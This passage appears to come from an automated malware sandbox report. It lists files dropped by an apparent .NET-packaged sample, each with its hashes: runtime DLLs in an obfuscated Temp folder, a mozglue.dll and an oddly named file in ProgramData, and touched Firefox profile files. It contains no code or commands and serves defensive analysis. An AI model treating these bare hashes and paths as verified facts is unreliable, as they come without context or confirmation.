SHA512 245e99b7711fd49cd14bda8e0bd78144fbd68dec1af399892ba1eba256670cd60b3f85535408990be8c01dd7cd8f81efabc022980384844dd994f169f7eb286c

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Xml.ReaderWriter.dll

MD5 24afced7db9a99bc4ac548e99763a093
SHA1 cf7e9bd3d518d5eba31b02e31d53a655cc3f92f5
SHA256 6d545167f9262a28c9ef9fe8e639e6219e9ab2d124654da1a8eb6fa0db9e0183
SHA512 43b8aa57a64aa0dd4e8056fd7d2c4ced02c9ef213ea1a435941f787cb613bed7134fb2431ee01fc6e70302785fdbaca65d9640d0cbb647734a2760208e639efa

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Text.Encoding.Extensions.dll

MD5 128862b6211e4968b44c417be3b7373b
SHA1 acae1850a6082e2f8ab717377d63b0a771a8d970
SHA256 4b406bd4a1a4c7d4015d5c7f5cf9671dec32209e22f9b1872d85876ac72c77db
SHA512 c06a0fc69379139be339d64e6a3c474f910743b80691055e8d7b7340a89175a312ba78f282e03cb96568f031de84700d2896c06d8c2749211708b6807acec0f1

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.Tasks.dll

MD5 2110985791b8fded0dcd4e67a5727665
SHA1 d1049e6fa55b4cd0034acdccf851a49e7538c141
SHA256 5ae758da56765672300750a5da4552946e9fcd1da0b0dbf41aa7ea6b55c6cbef
SHA512 585fdff6bced4513518d79486add78a5bd8b11ffbbaf3c07831de9b26b5e0760dce69ec6e3d1773a59b9244d1ff16041e197b100681154c8c59273ea5153bcf1

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ObjectModel.dll

MD5 c0fd9e3d9cf11aebade4c9154d343377
SHA1 c1bee1d415e8301f78861fc88271609388652c61
SHA256 dd3056b9a3fabd89fc59b0feb6fa0edececf76f88f96a545585b48242ecfbbd9
SHA512 3f65d44c257f72c9970b1b8c5206dd884020faa0da9487898277bc4f218d189b5dd6c2a2963e1f8f653c14baf17f7fb9b415aeca064d450f8e572dea229fb58b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\UIAutomationTypes.dll

MD5 c856a5e1458398c5d869263b3ba4af4a
SHA1 961d244e882858695be7e92bbfba2dfe15f01a10
SHA256 d9ea457607174d8f78ce78ae1b4c12aefc6c78f02eca88ca005ecd92866dfc45
SHA512 512435de86a446848540887354799eee0605d6d113c043772eaa3bc992c0a838c078560ab04e2a3b0e153e566e8f727bb473ecf541872eb9c4e7d62623602fa5

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\wpfgfx_cor3.dll

MD5 d99c93b53749d4364c7b16d5d99e3935
SHA1 cd9743223ba6c1199ea57d6dfbd764e2aff60033
SHA256 f8f7f596cd6151b47784ed96223d16f54b2b872768b03a0492ef19513c05771a
SHA512 ca29d5136c5d7b6b99009a9a356d62eff88acebf32707b8c1e540a7b946420aab5cc0f1148b7ebac891ff3afb321aca4bc122cfb20395ad3baf1cb68ee76a928

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\D3DCompiler_47_cor3.dll

MD5 c4974c924b605bd322c4872d72de90d1
SHA1 20df9433eab24d3291696046646f493794b77cba
SHA256 71d766b4742ca9f7422bb2efc3dc03f2cee509a5a43d241e748cda7aaac24bf4
SHA512 3889648dbb4608ece9c68f1cd5b1601da5b795eade7910764dd4769090cdb209a39acf3986e6e7190745f3bc6b1477a52dfaccb96a7e799eafc0825e2c44a846

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.Concurrent.dll

MD5 992c175788f755fb2a42d8396d3cdc81
SHA1 e6356673f7388c74398874e0788964652120721f
SHA256 e0b327e294e9d2159dc124d1f8008438273e36902bf7d3c75589c0374b2d2169
SHA512 7e741cd8763fa32d243d540b7abaf9bc993a2a6d870b08d3ab52de5c8462432d026d3a22ceea51ebd98f03903083fa1e0551168559f14cd846175a5030c314e5

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.WebHeaderCollection.dll

MD5 596e86ca6e905e9e39a22a414565e837
SHA1 5b20a087f3053353d044ac3e7bd910e84cd95775
SHA256 1233307a5c573f5fd04bbbe86181477d60fff68c7b023693c7d1a79d46a2dec3
SHA512 4261502b56e965cba5fefe7af39b42533daa82d8a840288c7c326801c040d51c38dcd21f59f43f6664cb759b2c20c904812ea570711e3cadab0ccff031e7509c

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Text.RegularExpressions.dll

MD5 a4a481b0511e35077b8686a709a25c21
SHA1 ad18ab5564f818437d53a52c617493b5b04473e8
SHA256 208ae0dc8e09d5b414efea346f22e847e9bbcc23ccf4d652632cbf8ced0bd846
SHA512 97eda35809808028889a68750ba84da7bee745d812380ecedd77392418531cb70cc0622cde9bd5cae94bcbe47a7a29addba02a39b00c2bc9c3a276593eae94fc

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.ServicePoint.dll

MD5 d9493d7a81e9cbf310c1abf17011893a
SHA1 cee4c0895eab932c46889315b9084ec89c38e9a3
SHA256 5c127c2d20f679a2470ed22cf3803fb40f9ccc6b4c7f9fcf8f4cb6502adc215c
SHA512 bcc4db709c18a19c9cf699b57fc434e57bd7dfe8cd7781337fc80eea9f8b423ebcc11b86a340544a3baeedd4952af9663ef21efc547686aa1c134d28d3ba440f

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Cryptography.X509Certificates.dll

MD5 1bb84a0914dd86646d4d423172c2bda4
SHA1 58a9ab1f5c9f54f43c7927a674cc115e8b4c5ffd
SHA256 cd1e54c12d47708198c9449b7d06d2b0034d9d9bcb22a5174cc42111bb0913e8
SHA512 05aeafe8fedbb27eb4bd79f07bb05950bbe249b9a773ef5a0ac52052108d944d386ee646af16a0f859a0a1b0f5a56726da6511db3dae5b1721f0519e1bdfbe2a

memory/1776-3325-0x00007FF8A8C30000-0x00007FF8A919F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Http.dll

MD5 3005e19fb382841f97af0508814d821a
SHA1 bd74cc9e25f9c503b24a02ae81cbcb3fef3b780e
SHA256 862cdc56d59371f55d8fc88a7fc363268d3c5a347b2ff0d54177484827b07fc3
SHA512 45ae42a2df1eec2646dd552d06a966d03c4a1dfbd245b3ac795c2921060c99d7807a458e78ff2d5efd46c8c1ee6d675e7caf3e36d63525665ad2515a40a6ef4c

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Tracing.dll

MD5 bb1b038b4329e69857e0a74431c2da9a
SHA1 b29a2ce9b720689341fb504cebc3442cfdf30bf0
SHA256 448397f78f01848e46f82dd1044c205a0758fa6f0a5202d25e77e17b1b93b88a
SHA512 207d222e22df4dae4fe6692ff149bd929d92434092950f3668a10cbb0c251f3625305a3244125303c750aaaf5575318e05c90f2bb05c29ea1fbbc67b3765d923

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Drawing.Primitives.dll

MD5 f4c82fe039fafec7b956bea280b3b5b4
SHA1 d89362203e929b8fba43d47a8a97542cf6e56c8f
SHA256 6ae911a17cba6dd7d8abb3db5d15a027df0d2f23ea20efc2aca4c0d787dabbbd
SHA512 0c0bc3438edb576d75e16bc17b248dc3bcdaa3c5a4cc1b47bb98a77a180afd59a91ef75f0f33b9ab8953b6eee35d9fb97bb47db2fb6cd33a16b6a482a62a00f3

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationFramework.Aero2.dll

MD5 2d0a981c8d6bac2ff50f07e87b4d03df
SHA1 20c555c0422426c51579b7b22fc6f8efd81d3d00
SHA256 caa19eba3216d8797d97eb3e3b51c5d00a361af2575230a7103822f8d932670a
SHA512 5ade6f1f1416c946c0920a51b1a5306a0f082c07b5478bd052f616aef26094e37263b9d26d00c823f6ce6e288ec8181267eef214f071cc0b79604977cd1b0ef2

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Principal.dll

MD5 d7053e07d29f6548738ac17bcc0319a3
SHA1 043015de95e66f0358bf27050d38137124545f71
SHA256 4a8d8f2d5b3e84a3ea268aded9b145d0626f8c226dd9224ddcd0bb236805c935
SHA512 ca5509a27b8b3eeaf0b4b6f3d30965360291f23aed51e805b3467f50a7e899c4bbf2555251508ddec74908261df73e6ba818e8c6c6e3b2933321d23e50aae10a

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Primitives.dll

MD5 205911b8991a2ba5c148421a1613af48
SHA1 3fc23e2a1bd880944d1a4b9b3680137e89afca63
SHA256 95dce881993f1ddbc0dbd9fcd69aa99f786251332b7f84a7fc8216eb79c051d4
SHA512 df74439725e7f548782df8e523d7aaf3ae620ce7e3c89e83a5849fbd4f474bafa1c896f389a7340b01c2d43b01750df22272a388cee7bb6eaa0353db4e7f1215

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Requests.dll

MD5 cdfde683a8dfcf189e6ef13d79fe6ac2
SHA1 eadf33b7b7d0c9080ae36ebabce595e0c821afe0
SHA256 3ea325baf9b494bffb7a1c3e572ee5305fc3f3d6343e0d1045dd0586a6ea134d
SHA512 3dde40b9335448bec85e48e5201f948cc11d491474fd1aeb97f6ebc901dc99e2078b64d78ac7550e6c4acce5c2392d858e54e019b150d95203ff26093390c925

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.ThreadPool.dll

MD5 e3571049c8b45982e1ca741057f4f22c
SHA1 924d696c3a1ff405c957bd69a3570e13e0ffaea4
SHA256 ce8a2fb0ee094be943cded2cb0fac878055b752728674350401e7f1339c9cfbd
SHA512 eb53b2b6ab602e3907c3e4e4d94380538cfba3ac1a42fe33811c20e02024a0add0896154eddcf06890d10435ad27e604cba19e42b3031f1d930680a60dd0e53b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Windows.Extensions.dll

MD5 77265623f14e3d39286c7ff54264ba86
SHA1 d6786e33d02d92e783c3a2b69e632e4bd44f45a6
SHA256 2783ae2cb0d019f44e4d75a0a4d322575d38b9e2a6c3bfd27ce9ca81ed9fc337
SHA512 c5722f1987e8167177fc1e2ff85f5939f28e77de7d7afa0cf85417c91d8b03fb968c3a050838987c469188904c199b2460c804b2021e173e5d7d4ce7aa92c9a3

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.TypeConverter.dll

MD5 934f771ed3849265f7cb89866a84b26e
SHA1 f5b3302fdc168514e37c76633ff7dd0968f8c833
SHA256 e73a35f151a08896219ef06673eafa3d17ffe1b9c2e6a57e77d07f2dd243ad54
SHA512 7149ec592a4c60b689e8b196c5b10c22b401f820b47bb9d0be679b36bedb3e5b6054a07396d49cfc4daa1f8d9882494e373b7268349a9cac753c81e61c5cee45

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.TraceSource.dll

MD5 66e23826c6e7683c68195dfd20c7e57d
SHA1 01a9225bfac17b3132eba05622a6d75dd26c7b6c
SHA256 196ca48951c0df5d2cd78ceb73b5626aec73f78edde46053ed18560430e67668
SHA512 8582cf5050fc520fbecd866b19d9510c63adde71489daee705022464211d1dc9a6c9996926725ac563cf1a64546ce2bf036427b0bfdfba529a3949dc78889c0d

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Resources.ResourceManager.dll

MD5 18e44aa1e31451c58742d50fea127d16
SHA1 3bdb4d9cefcb36b780a43b00df585dbbc128414b
SHA256 32342669f0efbf28f74210b9b7e6e2070b3cf5e1d4f37f7dd3ba3666f8ba5403
SHA512 30dbac2812d033c8d7bed3401b3a0f2adafc6c373df2e177e3c51d7ea6bda7c64a53bd58a5a8dae32647aebe0126a92a66b704f5532a74088045b9ed19a5f22f

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.dll

MD5 5443e5c4e2602e2a0afe3f9d4d5cdfb5
SHA1 9c31db28d00d0616afeef4bf3b42b9d5a6a07a1d
SHA256 6ef0ba90e0ae890db91b6b005117b497e944e79b520c098b8f06040503991030
SHA512 2ef249c5eee6bda22fa30d3512d924b79d4d0e283661847d4115760bacd8bc0c358bd637e6b16b0b87ce04fdbbb19a555003dd19b3adcf172635428c17d7d8a6

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Cryptography.Algorithms.dll

MD5 c11aa05814eb3441df91a9cba416cf63
SHA1 8b201581b2d8fddc9ec5036323e68be5e19f6a24
SHA256 7862bc0b31f9e06b06fc3271027d4f98b00a4a73bc8b3354933e73dfc9857587
SHA512 3d4f1deb6d50a039923ebe4aa04919baef4c550f3fd99b5336e7398249250a0628ddc4cdf017abefc05514a718237f947fadd9e9a68b77205b511ab2c134f929

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Memory.dll

MD5 ec20ad9dc70036d33dbfe26205578f46
SHA1 f5f487dce89180bbe5889c3becd5fc32eba32933
SHA256 dfb494d5654d10101cce8cb98850f2ffd68464bcaa0353109f3aeef8e9b8534c
SHA512 266753705ba6d24227f0c2a5a5660829b61a441b927df48880a14138ebaa5afe779407817be43cb119a22655b4ac3326a6734116550d617bee67511386ecd4ce

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.WebClient.dll

MD5 44bf76de7f1c343f2fcaa3409da1addd
SHA1 6219d959b052a8fca7cf226ad931b8067b1cb9dc
SHA256 70800e07022069a911ba15e0e287348b61cb6ecedc4a5c051e3ede64074fee89
SHA512 70fd04d7882748f8ca444948fa4998287c517be376a92b34bff1686b8d3a56c10c21d20535d3e06d3e7b88ece237d74211a0cdb8434e73777e0a4406f7a4e958

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.IO.FileSystem.dll

MD5 7de43fff6887ce2c7e1a3e857d9dae32
SHA1 1c08016b08f44ed510dc3c9b3415c0c437fd6fe6
SHA256 d9c448babdcf592e0fcacdffb395ec66ddc74469e9a7fcf281bdacf4f9be7382
SHA512 c87ebf4e57ca935f51721d72ad8f46b8468513a0ffbea5d001f72be7c94f4c99b0d793cc589517c348e9e20f62eb8303eedfe0ce6fcf2a4a8b5b10ebd4040d06

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.Xml.dll

MD5 2e0bca776c66205b6ff384b2bcb502e5
SHA1 65ebef087cd75c395d2c57afadb7837181213ba0
SHA256 05d839af14b4f847189259fd2526a7d47c0f0aafacf913224c159364b06f39ee
SHA512 55dec22ff719ba04363037514872cded0b8e6e15c581c3b947b1a7bb5b504fef14601296fe21c259f854b414d2a9d917c5076b63ef71cda49155fd5d89c88941

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Configuration.ConfigurationManager.dll

MD5 6914ee97fdcf185fb0a30c62212dbf6a
SHA1 648a55c63641349f548d078eefbf50c5def381e4
SHA256 fa9eabf7d25e38b8f2388489c1fc8ca272a01364137bac26762819ca8f26facf
SHA512 1b7219376c82566d50c49f521436163eda8fb50d9667527a20d355c716ea444b92cbe756d20862e16a768ec067fb8305ef011cde1149cfe9031d0d84479ef50e

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Process.dll

MD5 bf5183f8265c7ab13da680f758dcb596
SHA1 be25478b6c3357e3507d679269d1d4b97c1ef648
SHA256 5f4591a617547661aa486c5b31cf9673be4c95b930a5cf898bd23b07bc1bd8fe
SHA512 5507ab30bd53bd36a6cfe25037d4c3b6e5801a24cbc17973e927b1b9675fb5be2551d73cc3b249bec118928d2d51c560cf5ec8939bd08e178a457f68ea8d3ecf

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.Primitives.dll

MD5 ad43b19efb5bf397a7ff7f0c4bc23f3a
SHA1 557831bf876e662941658d45b7a63242229e62fa
SHA256 b95484e1e93daab32a9871faf33800ab3c583b1d830dcbd961a6cfb0cef408bb
SHA512 bcbad6dddcd29c9e7f435fe38472d2cf76a9d2c9af8990a31ce86f051039b6ec2e28c0064a165e62b18883a6091cd9d9361390d4fd63ec6960910139e40f7b52

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.Specialized.dll

MD5 bf9a3586fec3260029027a33b85895a9
SHA1 2d1d81a5b8dcbfcd55b736e0f7315427f8a34f18
SHA256 f48f2a6c889e04ed84623a6daa6e8111ec803296ac430ef0c28891d18ffa31d0
SHA512 c384fc356a9f36a6b784d679db68bac7c1b191143ac4bda850cb025926c6d28213cbe10148d4de4899fc04621186326ae26c146b995001a6085a30fd1d4028f0

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Microsoft.Win32.Registry.dll

MD5 893b2cff039236aeb623dd8ea269cded
SHA1 9f0d9c6995e90717c1d8644036d5bedd7740af4b
SHA256 b88fd3261604df67b5c107bf6e8f5449c9504b4040c45629abfaf85c42ff89b0
SHA512 f7c2add8591677ea5baeadf4f168db839f82af75da85425faa8ee48400dbff14daf216365cc5d574abd7b327ee6e9d2a73865768169ec3886a8b30523ae4cebb

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.dll

MD5 1a8a403bc2f3e820eb4a362ad02b9888
SHA1 fe9351468302278d53f5f1bb0345480c2662ccef
SHA256 c06b2f5d1c54cc7fca9eceda9bbe3bdd08ec20abf8fa4edae67db2280c233627
SHA512 87fe8047a34149eee08330b746b6ecf6ab6c7cf66edeafb6cca111275b67d08216a8bc96577d98591dfd0f529b811ae89ff6d45b3d92b82d110688f3d64f722b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.NonGeneric.dll

MD5 a8d917449a4d16c59475bff47dbe9c2f
SHA1 2f7c3fff9523d9a68b022808828be263a7fd11c8
SHA256 88a92d9af78bd06d775609ec1a8f20deed6228894992ef66df07720db5902179
SHA512 e03636884e3dce45a0c7604effa36e90089426a802c7e95356b3002898be7a91fcb386101d48c2d5c855234e5b6541e02dc9289cf8a62622cbb8addf177b3e9d

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Microsoft.Win32.Primitives.dll

MD5 27b3ee8d64b2b1290eaf90bfe7d0b009
SHA1 d30b53d53f0258666987f9a9fc15c862c6f36935
SHA256 5905b9e94aae08d2d8e63a5d907493d89f98153ec95b43e241db5e3a3c6f5bb9
SHA512 cc9910757bf24efead841d0632e95bf8a24577bc762391944dd6a82048984140a3f373ccdbaa3f9869e9f38c72213eeaaaad90dd318b3870a4b827e265292c92

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.dll

MD5 c8d25e5421e63e07974aa119971b56f5
SHA1 66d4dddd001bb3e432c575cfee094cb6d4dba0bc
SHA256 48f28a34628f517ec1693a5ed02ec30c2cb354a8423c43327825ead731ccadc6
SHA512 bbcc3746c978cc68f14ea735652841068822d606ad63b87538953569a9d683d5df0aa1d6901f65234de82730baf14e652879ffa8ee9fe72328fab91780ebe428

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Debug.dll

MD5 5551bc52714c47940af0805e12d14585
SHA1 98f951c402af93ed679d02036b54cd1d49facf94
SHA256 099b31a6e3afc8afb1519509a13d0dd9ef1474821deeb4fd1141dca6125fbc46
SHA512 4dc740b724804da1c38381c4eb7c9d9eeb2a2fd68b1c427983ab2c2a1a2d51334e929a937d622b4ff1e7caacf6c041f7873774f6e100d14ee3b575b73e8b85e6

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.CompilerServices.VisualC.dll

MD5 a45ad8a8dbd3b7f3e05e687d32d345fb
SHA1 0abc21058719988cb0c5a05de65cc659e929aa66
SHA256 f4991d6cb5d8b9034dfad1b5d66edbf59c86140433cfede99772815104dc178d
SHA512 5ef1598bc15e9b9f2f40901ac4fb35203243538fbe08f87765d5635b1c2467fb08eed21b5c35246082cc872758d9d10668e123f5d8c2e995ef2bacacb096ad11

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.InteropServices.dll

MD5 1076372d4f3d562c2d06ed4e5d7b76fd
SHA1 4ec0e72141aa8684ca22429844626f0fa6b665e9
SHA256 9da45352ed11cd9399be13780e1c5c235cd78e322c9b23acd4ab8ed65b76a67a
SHA512 3384c74d2a0a4fbff144e529c114bcab1265faca3509e41eea5efcf3bcdef2f836ba0e2ba1abec31cea1dcbe61a42afb33590d45c24029664f931966c74c9bdd

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.Extensions.dll

MD5 672d0c20b632d42f14f3c4bd2d9d2739
SHA1 84aee0e0d27900728ef601f68bd5892937453d22
SHA256 2f5fd0ebed622e1ee3da1a0b96adc2e3e2a4bd91d231594acc8d6dbed441b604
SHA512 76e2c44d166412598994c48cfa8426d09ff782b8b6703fce81710576b2998be6bfaa8f675ca67e3ebf056618a839f929ac6d8016f580c331d11f9f96c3018bc1

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\DirectWriteForwarder.dll

MD5 a1aec6b3f64bb37ffe136918de13e4f2
SHA1 4ec11db15f285e488f59cf02708ee4b32d505dc5
SHA256 ad94af9432b6d5322d265d60070d3ff49f1ba1012e0c367fc8364d1c595e1ca6
SHA512 14ffca7a127c6f806d5316448a49ac5440d0c7c8f6dc3725b4fd945fa06675ac09e3d33008c9de08af3ffab2ce91fd9c4a3c6a05713464a3115f7ed459b4e539

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationCore.dll

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\netstandard.dll

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.IO.Packaging.dll

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\WindowsBase.dll

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationFramework.dll

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jw120ick.m0f.ps1

C:\ProgramData\mozglue.dll

C:\ProgramData\GDBFHDHJKKJDHJJJJKEG

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
